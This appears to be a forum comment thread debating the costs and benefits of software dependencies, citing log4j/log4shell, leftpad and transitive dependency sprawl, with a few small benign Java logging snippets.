Just like the 30 million line problem by Casey Muratori: https://www.youtube.com/watch?v=kZRE7HIO3vk
Experienced smart developers are really careful adding dependencies to a project. Spending time evaluating the value/cost equation. Beginner developers copy-paste code they don’t understand from Google searches and add 10000+ transitive dependencies they also don’t know without even thinking about it. They haven’t yet been badly burned from too many dependencies not being maintained, bugs not being fixed and updates breaking your code.
Good: Libraries are leverage; as with financial leverage, use wisely to optimize results. At best, a library will be well tested, heavily reviewed, battle-proven code, and therefore worthy of trust.
Bad: Sometimes we convince ourselves that because a library has a large download count, it must be of high quality, and written by people far more qualified than ourselves. Sometimes this is true; sometimes a popular library is written by whoever was willing to write it first (and therefore grow adoption), which might not correlate with the other desirable properties.
Ugly: library authors naturally tend to be quite pro-library, more than the average developer. So they tend to bring in dependencies in unexpectedly large numbers. Your transitive dependency graph can grow unexpectedly large (especially in the npm ecosystem!). Your project can turn into the xkcd cartoon we are all thinking of, a tall tower built on some fragile bits you didn’t even know existed.
The claim is wrong that there are only 168,000 lines of code in this thing.
Here is a raw line breakdown, from the latest source tarball:
    .java         313,314
    .xml           53,442
    .properties     5,800
    .md             4,130
    .json           2,586
    .yaml           1,178
    .yml              780
    nil               762
    .tld              634
    .sh               531
"nil" denotes unsuffixed files.One of the pains I've experienced over ~1 decade as a professional SWE is that a lot of dependencies aren't really maintained. Many of the times I've diagnosed an issue in one of our dependencies only to find that the maintainer isn't really present or interested in upstreaming.
Many companies are uninterested in forking and maintaining their own version either
All of my points have already been stated.
The author’s heuristic is too simple.
Simply rolling your own is not smart, because there is a lot of detail (planning, implementation, testing, bug reporting, updating to work with different browsers/OSes/locales) that someone else has specialized in handling. If you are sure you don't need to benefit from that specialization effort, it might be worth it to roll your own.
On the other side of the ledger, there is a lot of uncertainty in choosing the right library, predicting when upstream changes might cause you heartburn (eg. short notice broken API) downstream. Also, predicting what hidden features the libraries have that you don’t want or need (log4j’s formatting RCE, Java Spring-Web deserialization) or how mature the library’s development/testing/maintenance is.
Making these data points more standard and transparent (is this part of “software supply chain bill of materials” proposals?) might help better inform these decisions.
The argument seems a bit myopic. The author is talking about errors and vulnerabilities found in libraries while ignoring those same factors in bespoke code. At best that's a "security through obscurity" scheme.
The problem with libraries is that they often contain so much functionality while you yourself might only need a single thing (and don't even realise all the stuff the library is able to do). Whenever I had to patch systems due to some vulnerability my first thought was "Wait, why the hell is a <xxx> library even able to do that?"
The log4j2 vulnerability is probably a good example of this. How many systems running log4j2 actually uses the JNDI functionality that led to the exploit?
I'm not sure they are ignoring those factors in their own code. It's more a case that the libraries might be increasing their risk factor by an order of magnitude or more.
Only if you use a small percentage of the functionality. If the dependency is maintained (not all are!), there is a good chance someone else has already discovered many of the bugs, so the bugs-per-line-of-code metric should be much lower. And the dependency probably has some features you wish existed but can't justify the effort to write.
It is about trade-offs. Is the time/money saved and the additional features gained worth the cost that some features you don't use may result in more bugs that affect you in some way? For the most part I'd say no: I can write my own whatever, but that too will have bugs, and I need to fix all of them. I work with people who disagree with me on this one, and so we have a lot of pain maintaining code we wrote ourselves that isn't as good as a library I could have downloaded. Or, in some cases, code that is already on our system: we have 6 different logging frameworks in one project, 3 of them written in-house. It's a big mess.
Another example is when the leftpad npm module broke the internet.
Not sure I would want to work in a place with such intense rules!
Ever work in Finance before?
"15-50 bugs per 1000 lines of code" is weird. The model should discount on number of years that have passed since a line was written.
I'm pretty sure the log4j bug was many years old.
Depending on the bug, it only takes one. There may be 14,999 non-serious bugs, and one Bad Bug. The other bugs just give the baddie some tall grass to hide in.
I think that not using dependencies, as a general rule, is a good starting point, but, like all these "hard and fast" rules, the proper answer is "it depends."
I think that importing a 20KLoC JS library, so you can animate a single window opening is maybe not such a good idea, but it may be worth it, if you plan to animate dozens of window openings. Even then, it may be a good idea to have one of your more experienced geeks take some time to write a utility that gets reused throughout the project.
I use a lot of dependencies. I believe that modular design is an important component of managing complexity and ensuring high Quality.
But, the caveat is that I have written almost every dependency I use. I write each one as a standalone project, complete with heavy-duty documentation, and lots of testing (Usually, the testing code eclipses the actual implementation code).
Because of this, I can write a pretty damn robust application in just hours.
If anyone is interested in seeing what I mean (I don't expect many takers), they can always browse some of the modules in my various repos.
A specific example doesn't contradict the norm. Bug discovery is like a stochastic survival process. The more a line of code with a bug is tested, used or whatever, the higher the probability someone discovers the bug. This means the number of bugs decays with time and testing. This does not mean there are zero bugs in old code.
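A toy sketch of that intuition, assuming (purely for illustration) a constant per-bug discovery hazard, which is of course a simplification:

    // Expected undiscovered bugs after `years` of use, if each bug is found
    // independently at a constant rate. It decays toward zero but never reaches it.
    static double expectedResidualBugs(double initialBugs, double discoveryRatePerYear, double years) {
        return initialBugs * Math.exp(-discoveryRatePerYear * years);
    }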
The elephant in the room is transitive dependencies.
> An interesting thing about developers is that we are lazy, and prefer to write as few lines of code as possible
This says so much about what is wrong with modern software development. It definitely wasn't the sentiment I studied and progressed through my career with over the last 30 years.
Isn't the whole essence of software that we are lazy? And so we write code so we don't do stuff ourselves?
Nothing wrong with being lazy if it gets things done, right?
It's not universally true either, not by a long way.
I've worked with plenty of devs who wore extreme verbosity almost as a badge of honour.
Beginner developers constantly reinvent the wheel
Intermediate developers use frameworks and code that already exists to avoid reinventing the wheel.
Expert developers use thin frameworks and minimize the external dependencies they need and maintain an internal library of simple foundational methods.
Nope. Beginner developers copy-paste code they don’t understand from Google searches. Including 1000+ transitive dependencies they also don’t understand. Experienced developers are really careful adding dependencies. Only adding dependencies when the value/cost equation really makes it worth it. Most Open Source dependencies are badly maintained and a bug fix might take years or will never happen.
Is there a minimal replacement for log4j?
System.out.println, or some thin wrapper there-around.
Most of what log4j does is stuff that arguably should be done outside of the application, such as log rotation and piping to file and what have you.
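A thin wrapper of the kind being suggested might be little more than this (a sketch: levels and timestamps on stdout, with rotation and shipping delegated to whatever runs the process):

    import java.time.Instant;

    // Minimal logging shim: write to stdout and let the environment handle the rest.
    final class Log {
        enum Level { DEBUG, INFO, WARN, ERROR }
        static Level threshold = Level.INFO;

        static void log(Level level, String msg) {
            if (level.ordinal() < threshold.ordinal()) return;
            System.out.println(Instant.now() + " [" + level + "] " + msg);
        }

        static void info(String msg)  { log(Level.INFO, msg); }
        static void warn(String msg)  { log(Level.WARN, msg); }
        static void error(String msg) { log(Level.ERROR, msg); }
    }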
I mean, dependencies outside of your application are still dependencies. I trust, say, systemd somewhat more than I trust log4j (although both would very much be in my "broadly trustworthy" category), but a few years back there was the shellshock vulnerability, so it's not like system components are somehow immune here.
The difference with external dependencies is that they are, in a sense, independent from your code. The really devastating aspect of log4shell is that log4j couples and integrates itself with deployed code.
You can't just upgrade log4j without pushing a new release of your applications, in the way you can, say, roll out an updated nginx or logrotate or Kibana or whatever.
The built-in JUL package seems to be what you'd want if you are trying to get rid of dependencies. In practice I find that using slf4j as your logging API is a good practice. You can start with it configured as a wrapper around JUL and then add a different logging implementation if you need more features like file rotation, etc.
How to use it in case anyone is interested...
https://examples.javacodegeeks.com/core-java/util/logging/ja...
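Or, as a minimal sketch with no third-party dependency at all (java.util.logging ships with the JDK; any configuration beyond the defaults is left out):

    import java.util.logging.Level;
    import java.util.logging.Logger;

    public class Demo {
        private static final Logger LOG = Logger.getLogger(Demo.class.getName());

        public static void main(String[] args) {
            LOG.info("application started");
            LOG.log(Level.WARNING, "retrying request, attempt {0}", 3);
        }
    }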
While you're at it, don't forget to significantly cull your SDK too.
...